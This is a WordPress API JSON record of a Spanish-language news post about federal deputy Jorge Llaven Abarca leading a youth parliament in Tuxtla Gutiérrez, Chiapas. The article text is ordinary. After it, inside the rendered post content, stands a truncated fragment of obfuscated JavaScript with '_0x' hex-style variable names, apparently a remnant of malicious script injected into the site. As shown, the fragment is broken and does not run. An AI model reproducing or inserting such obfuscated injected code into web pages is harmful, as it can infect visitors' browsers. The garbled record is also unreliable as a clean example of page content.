{"id":283,"date":"2022-03-08T01:39:02","date_gmt":"2022-03-08T01:39:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=283"},"modified":"2022-03-08T01:39:03","modified_gmt":"2022-03-08T01:39:03","slug":"encabeza-llaven-abarca-parlamento-juvenil-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=283","title":{"rendered":"Encabeza Llaven Abarca Parlamento Juvenil en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"771\" height=\"1024\" data-id=\"285\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0102-771x1024.jpg\" alt=\"\" class=\"wp-image-285\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0102-771x1024.jpg 771w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0102-226x300.jpg 226w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0102-768x1021.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0102.jpg 1037w\" sizes=\"auto, (max-width: 771px) 100vw, 771px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"940\" data-id=\"284\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0086-1024x940.jpg\" alt=\"\" class=\"wp-image-284\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0086-1024x940.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0086-300x275.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0086-768x705.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0086.jpg 1163w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"940\" data-id=\"286\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0092-1024x940.jpg\" alt=\"\" class=\"wp-image-286\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0092-1024x940.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0092-300x275.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0092-768x705.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220307-WA0092.jpg 1163w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Cominicado<br>07 de Marzo del 2022. Tuxtla Guti\u00e9rrez, Chiapas.- El diputado federal Jorge Llaven Abarca encabez\u00f3 el Parlamento Juvenil que se realiz\u00f3 de manera virtual y presencial, donde destac\u00f3 que la participaci\u00f3n de las y los j\u00f3venes en temas pol\u00edticos y sociales es trascendental para continuar fortaleciendo la democracia del pueblo de M\u00e9xico.<br>Acompa\u00f1ado por la diputada federal Valeria Santiago Barrientos, de las y los regidores Mar\u00eda Fernanda Dom\u00ednguez, de Chiapa de Corzo; Mario Hern\u00e1ndez \u00c1lvarez, de Ocozocoautla; y Monserrat Toal\u00e1 Grajales, de Suchiapa, as\u00ed como de participantes virtuales de 60 municipios de la entidad; Llaven Abarca escuch\u00f3 las voces de este importante sector de la sociedad, quienes expusieron temas relevantes como inclusi\u00f3n, derechos humanos, Reforma El\u00e9ctrica, cambio clim\u00e1tico, empleo, educaci\u00f3n, violencia en contra de las mujeres, entre otros.<br>\u201cNuestro compromiso es promover espacios de participaci\u00f3n de las y los j\u00f3venes para analizar y debatir temas sociales y pol\u00edticos que son de su inter\u00e9s, nuestros j\u00f3venes son parte fundamental para construir una sociedad m\u00e1s democr\u00e1tica, inclusiva y con mejores escenarios de desarrollo\u201d, declar\u00f3.<br>Por \u00faltimo, el diputado federal destac\u00f3 que es un aliado de los j\u00f3venes y desde la C\u00e1mara de Diputados legislar\u00e1 a favor de este sector de la poblaci\u00f3n, atendiendo sus principales necesidades.<br>Por su parte, las y los participantes del Parlamento Juvenil reconocieron el compromiso del legislador chiapaneco de escuchar y atender a las juventudes, que son eje trascendental para transformar a Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Cominicado07 de Marzo del 2022. Tuxtla Guti\u00e9rrez, Chiapas.- El diputado federal Jorge Llaven Abarca encabez\u00f3 el Parlamento Juvenil que se realiz\u00f3 de manera virtual y presencial, donde destac\u00f3 que la participaci\u00f3n de las y los j\u00f3venes en temas pol\u00edticos y sociales es trascendental para continuar fortaleciendo la democracia del pueblo de M\u00e9xico.Acompa\u00f1ado por la diputada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":284,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-283","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/283","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=283"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/283\/revisions"}],"predecessor-version":[{"id":287,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/283\/revisions\/287"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/284"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=283"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=283"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=283"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}